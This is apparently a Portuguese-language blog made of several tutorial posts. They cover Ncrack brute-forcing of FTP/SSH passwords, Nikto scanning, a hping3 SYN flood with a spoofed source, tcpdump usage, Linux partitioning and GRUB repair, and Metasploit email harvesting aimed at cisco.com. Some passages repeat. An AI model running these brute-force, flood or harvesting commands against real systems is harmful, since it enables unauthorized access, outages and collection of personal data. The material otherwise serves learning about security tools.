Ncrack é uma ferramenta de código aberto para autenticação de rede . Ele foi projetado para craqueamento paralelo de alta velocidade usando um motor dinâmico que pode se adaptar a diferentes situações de rede. Ncrack também pode ser extensivamente aperfeiçoá-lo para casos especiais, embora os parâmetros padrão são genéricos o suficiente para cobrir quase todas as situações. Ele é construído sobre uma arquitetura modular que permite a extensão fácil de suportar protocolos adicionais. Ncrack é projetado para empresas e profissionais de segurança para auditar grandes redes de padrão ou senhas fracas de forma rápida e confiável. Ele também pode ser usado para realizar os ataques de força bruta bastante sofisticados e intensiva contra serviços individuais.
Instalação:
Baixe o arquivo:
$ wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
Descompacte:
$ tar -xzf ncrack-0.4ALPHA.tar.gz
Entre na Pasta Que foi gerada:
$ cd ncrack-0.4ALPHA
Execute :
$ ./configure
$ make
$ su root
$ make install
Quebra de Senha no FTP:
Vamos preparar a nossa wordlist :
No Ncrack exitem parâmetros bem similares ao do nmap nesse exemplo atacaremos um servidor FTP:
# ncrack -v -T5 --user caos -P /root/senhas.txt 192.168.0.33:21
Onde: -v : Modo verboso, nos da mais informações sobre o alvo;
-T5 : Intensidade do ataque, que Varia de 0 a 5, onde 3 é defult;
--user: Especifica um unico Usuario;
-P : Especifica uma lista de senhas;
192.168.0.33:21 : Servidor do ip ":" Porta do alvo.
Login: caos
Senha: hackercomcafe
Quebra de senha no SSH:
Onde: -v : Modo verboso, nos da mais informações sobre o alvo;
-T5 : Intensidade do ataque, que Varia de 0 a 5, onde 3 é defult;
--user: Especifica um unico Usuario;
-P : Especifica uma lista de senhas;
192.168.0.33:22 : Servidor do ip ":" Porta do alvo.
Observe que o ataque foi efetuado com sucesso, obitivemos o Usuario e a Senha do SSH
Login: caos
Senha: P@ssword
Depois é só acessarmos o nosso serviço SSH:
Linux - Redes - Segurança da Informação
Nikto é um scanner de vulnerabilidade de serviços web. Seu uso é simples e eficaz.
É necessário que o perl instalado na maquina atacante para que o nikto funcione.
No Kali o Nikto já vem instalado por Defult, então se você está com o Kali pule o passo de Instalação.
Mas se você utilizando outra maquina Linux a intalação é o seguinte:
Instalação:
Baixando o Nikto:
$ wget -c http://www.cirt.net/nikto/nikto-current.tar.gz
Descompacte:
$ tar -xzpf nikto-current.tar.gz
Após a descompactação entre na pasta, não é necessario a instalação pois o mesmo é um script perl.
Digitando nikto no seu terminal ele lhe dara as opções.
O primeiro passo é a atualização dos plugins:
# nikto --update
A usagem é a seguinte:
# nikto -C all -h [ip_do_alvo] -p [Portas] -o [arquivo_de_saida].txt
Onde:
-C - Força a checagem de todos os diretórios em busca de cgi;
-h - Indica o Host a ser averiguado;
-p - Especifica a Porta, se esse paramentro não for incluído ele varrera só a porta 80;
-o - Indica Um arquivo onde serão guardados a saída.
Agora é só obsevarmos o arquivo de saída:
Linux - Segurança da Informação
Syn
Vamos começar entendendo o que é "Syn":
Syn era uma deusa da mitologia nórdica ou germânica, considerada a guardiã das portas dos mundos mágicos.
ops: Contexto errado :D
SYN que é a abreviação de synchronize que traduzindo para o português significa sincronizar, é a primeira mensagem que é enviada quando um computador deseja comunicar-se com outro.
Onde:
--fload enviado pacotes o mais rápido possível. Não mostrar respostas.
-S --syn envia a SYN flag
-c determina o número de pacotes
-a faz um spoof no seu Ip [ Opicional ]
-p a Porta que você quer floodar
Pro ultimo o Ip.
Colocando em Pratica:
Com uma Shell atacando o uso da cpu sobe impressionantemente . A variação fica de 40 a 67 %
Com duas Shells Atacando Chega a quase 90 %
Com as três alcança o 100 % de uso da Cpu.
Nesses casos a vitima esta sem nenhum firewall, fiz mais testes com o Firewall Comodo Ligado.
Vamos começar entendendo o que é "Syn":
Syn era uma deusa da mitologia nórdica ou germânica, considerada a guardiã das portas dos mundos mágicos.
ops: Contexto errado :D
SYN que é a abreviação de synchronize que traduzindo para o português significa sincronizar, é a primeira mensagem que é enviada quando um computador deseja comunicar-se com outro.
Quando um cliente tenta começar uma conexão TCP com um servidor, o cliente e o servidor trocam um série de mensagens, que normalmente são assim:
- O cliente requisita uma conexão enviando um SYN ao servidor.
- O servidor confirma esta requisição mandando um SYN-ACK(acknowledge) de volta ao cliente.
- O cliente por sua vez responde com um ACK, e a conexão está estabelecida
Essa é a conexão normal que chamamos de Three-Way Handshake .
Dos
DoS significa "Denied of Service" (Negação de serviço). Que tem como o objetivo principal deixar o serviço indisponível. Neste caso o atacante não invade o computador ele apenas o sobrecarrega. Geralmente o ataque de negação de serviço é feito de duas maneiras:
Local: Esse ataque consome tanto os recursos que força a indisponibilidade do recurso (como memória ou processamento por exemplo.
Remoto: Faz uma inundação de pacotes inúteis causando obstrução a midia de comunicação entre os utilizadores e o sistema vítima de forma a não comunicarem-se adequadamente. Vai ter tanto Pacotes inuteis que os pacotes verdadeiros não vão poder realmente estabelecer conexão.
Conhecendo o Ataque:
O Syn Flooding consiste em manda vários pacotes syn de uma vez só não esperando o retorno da Flag Syn-Ack. Com tantas requisições inuteis o serviço acaba ficando sobregarregado e não consegue fazer o Three-Way Handshake , esse Dos remoto que manda pacotes Syn é bem suficiente para derrubar um alvo.
Laboratório:
- Usei aqui um Linux, pode ser qualquer um, eu usei o Elementary OS 0.2 Luna como atacante;
- Windows XP com a ultima atualização como alvo.
Ferramenta:
Instalação:
No kali essa ferramenta é nativa, mas para voce instlar em derivados de Debian é facil:
# apt-get -y --force-yes install hping3
Apresentação:
Hping é uma ferramenta de teste de ping, mas ela não faz só pingar, no ping tradicional existe um limite que vai depender do seu sistema. Já no Hping você manda o pacote do tamanho da sua preferencia.
Vamos mandar um Help na ferramenta
São tantas possibilidades de ultilização do Hping que não deu pra colocar tudo em um print só, mas essas primeiras são as mais importante.
Sintaxe:
A sintaxe de ultilização para syn flood é simples:
# hping3 --flood --syn -c 10000 -a 10.50.81.78 -p 80 10.50.81.56
Onde:
--fload enviado pacotes o mais rápido possível. Não mostrar respostas.
-S --syn envia a SYN flag
-c determina o número de pacotes
-a faz um spoof no seu Ip [ Opicional ]
-p a Porta que você quer floodar
Pro ultimo o Ip.
Colocando em Pratica:
Aqui ainda não iniciei o ataque o uso da CPU varia de 0 a 10 %
Com duas Shells Atacando Chega a quase 90 %
Nesses casos a vitima esta sem nenhum firewall, fiz mais testes com o Firewall Comodo Ligado.
O resultado não foi muito diferente, só tive de usar uma shell a mais pra consegui alcançar os 100 %
Linux - Segurança da Informação
TCPdump é um poderoso Sniffer com interface em linha de comando.
Ele deve ser usado como root (Superuser) ou com direitos de super usuario.
#apt-get install tcpdump
Para ver as dependencias:
#apt-cache depends tcpdump
Se nenhum protocolo é especificado, todos os protocolos são usados.
Se nenhuma fonte ou destino for especificado, os "src ou dst" palavras-chave são aplicadas.
Por exemplo, "host 10.2.2.2" é equivalente a "src ou dst anfitrião 10.2.2.2".
Se nada for especificado host é usado.
Por exemplo, "src 10.1.1.1" é equivalente a "src host 10.1.1.1".
Negação NOT ("não") tem maior precedência. Alternância OR ("ou") e de concatenação AND ("e") têm a mesma precedência e associam esquerda para a direita.
Por exemplo,
"not tcp port 3128 and tcp port 23" is equivalent to "(not tcp port 3128) and tcp port 23".
"not tcp port 3128 and tcp port 23" is NOT equivalent to "not (tcp port 3128 and tcp port 23)"
Tradução : "Não tcp porta 3128 e porta TCP 23" é equivalente a "(não a porta TCP 3128) e tcp porta 23".
"Não a porta TCP 3128 e TCP porta 23" não é equivalente a "não (porta TCP 3128 ea porta TCP 23)"
Os dados capturados não são armazenadas em texto simples para que você não pode lê-lo com um editor de texto, você tem que usar uma ferramenta especial como TCPdump ou Wireshark, que fornece uma interface gráfica.
Ele deve ser usado como root (Superuser) ou com direitos de super usuario.
1. Intalação do TCPDUMP:
Fazer o download do programa:#apt-get install tcpdump
Para ver as dependencias:
#apt-cache depends tcpdump
2. Sintaxe:
Protocolos suportados:
ether, FDDI, IP, ARP, RARP, DECNet lat, sca, moprc, mopdl, TCP e UDP.Se nenhum protocolo é especificado, todos os protocolos são usados.
Para onde apontar:
* src, dst, src e dst, src ou dst *Se nenhuma fonte ou destino for especificado, os "src ou dst" palavras-chave são aplicadas.
Por exemplo, "host 10.2.2.2" é equivalente a "src ou dst anfitrião 10.2.2.2".
Host(s):
Values: net, port, host, portrange.Se nada for especificado host é usado.
Por exemplo, "src 10.1.1.1" é equivalente a "src host 10.1.1.1".
Operações lógicas:
Valores: NOT (não), AND (e), OR (ou).Negação NOT ("não") tem maior precedência. Alternância OR ("ou") e de concatenação AND ("e") têm a mesma precedência e associam esquerda para a direita.
Por exemplo,
"not tcp port 3128 and tcp port 23" is equivalent to "(not tcp port 3128) and tcp port 23".
"not tcp port 3128 and tcp port 23" is NOT equivalent to "not (tcp port 3128 and tcp port 23)"
Tradução : "Não tcp porta 3128 e porta TCP 23" é equivalente a "(não a porta TCP 3128) e tcp porta 23".
"Não a porta TCP 3128 e TCP porta 23" não é equivalente a "não (porta TCP 3128 ea porta TCP 23)"
3.Modo de Usar:
Para exibir a saída TCPdump padrão:
#tcpdumpEm modo Verboso:
#tcpdump -vMostra as interfaces que são suportadas:
#tcpdump -DPara exibir endereços numéricos ao invés de endeereços (DNS) simbólicos:
#tcpdump -nPara exibir a saída rápida:
#tcpdump -qCapturar de uma interface em particular:
# tcpdump -i wlan0Captura UDP:
#tcpdump udpCaptura de trafego na porta 80:
#tcpdump port httpCaptura o trafego e o armazena em um arquivo:
#tcpdump -F file_nameCapturar apenas 20 pacotes:
#tcpdump -c 20Para enviar a saída de captura em um arquivo em vez de diretamente na tela:
#tcpdump -w capture.logPara ler um arquivo de captura:
#tcpdump -r capture.logOs dados capturados não são armazenadas em texto simples para que você não pode lê-lo com um editor de texto, você tem que usar uma ferramenta especial como TCPdump ou Wireshark, que fornece uma interface gráfica.
Para exibir os pacotes com "www.google.com" como seu endereço de origem ou destino:
#tcpdump host www.google.comPara exibir os pacotes FTP provenientes de 192.168.1.100 para 192.168.1.2:
#tcpdump src 192.168.1.100 and dst 192.168.1.2 and port ftpPara exibir o conteúdo dos pacotes:
#tcpdump -ALinux - Redes - Segurança da Informação
/boot :: para a instalação do boot do sistema.
- Tamanho : 300 MB
- Tipo : Primaria
- Tipo de sistema de arquivos : ext2
- Ponto de Montagem: /boot
/(Raiz) :: Para instalação do Sistema
- Tamanho: Recomendado 4.5 GB minimo.
- Tipo: Lógica
- Tipo de sistema de arquivos : ext4
- Ponto de Montagem: /
/ home :: Pasta Usuário
- Tamanho: A critério
- Tipo: Lógica
- Tipo de sistema de arquivos : ext4
- Ponto de Montagem: /home
SWAP :: Partição dedicada a memoria Virtual.
- Tamanho: Metade da memoria RAM do seu Dispositivo
- Tipo: Logica
- Tipo de sistema de arquivos : swap área
Se você vai usar DualBoot com outro sistema operacional uma coisa que é bem legal é você recuperar o seu GRUB.
"Em computação, GNU GRUB (ou apenas GRUB) é um multicarregador de um sistema operacional (multi boot boot-loader) criado pelo projeto GNU.
É utilizado, normalmente, quando se deseja que um computador tenha dual booting, ou seja, que o usuário possa escolher ao iniciar a máquina, um sistema operacional (SO) dentre dois ou mais sistemas instalados. Em termos técnicos ele é um programa que pode carregar qualquer arquivo (ficheiro) executável com um cabeçalho multi boot nos seus primeiros 8 kB.
Este cabeçalho consiste uma sequência de bits com: 32 bits de um "número mágico", 32 bits de flags mais 32 bits de um outro número mágico seguidos pela imagem do arquivo executável. O GNU GRUB foi desenvolvido a partir de um pacote chamado GRand Unified Bootloader, de onde deriva o acrônimo GRUB. O sistema operacional GNU utiliza o GRUB, assim como muitas distribuições GNU/Linux...".
A instalação é bem traquila.
$ sudo add-apt-repository ppa:yannubuntu/boot-repair
$ sudo apt-get update
$ sudo apt-get install boot-repair
Ai depois é só correr pro abraço :P
Linux
Usando o Metaesploit para capturar email
Ative tudo que o Metasploit precisa pra funcionar
Depois abra o terminal ( ctrl + alt + T ) e digite : msfconsole
Com o Comanda "Search" você procura tudo relacionado com o seu objetivo o nosso é o Gather
msf> search gatherOu pra ser mais direto pesquise por email_collector
Para usar use o comando "use" mais o caminho
msf> use auxiliary/gather/search_email_collector
Com o clear você limpa a tela e show options você exibe as opções
msf auxiliary(search_email_collector)> clear
msf auxiliary(search_email_collector)> show options
Identifique os parâmetros:
- DOMAIN
- OUTFILE
Depois é só usar os comandos abaixo:
msf auxiliary(search_email_collector)> set domain cisco.commsf auxiliary(search_email_collector)> set outfile resultado.txtmsf auxiliary(search_email_collector)> clearmsf auxiliary(search_email_collector)> run
O que esse auxiliar faz basicamente é procurar em motores conhecidos emails do site em que você setou!
Infelismente o resultado não nos voltou nenhum resultado, mas tente em outros sites ou servidores própios que exitem vários sites com algo esposto, sempre tem ;)
Linux - Segurança da Informação
Assinar:
Comentários
(
Atom
)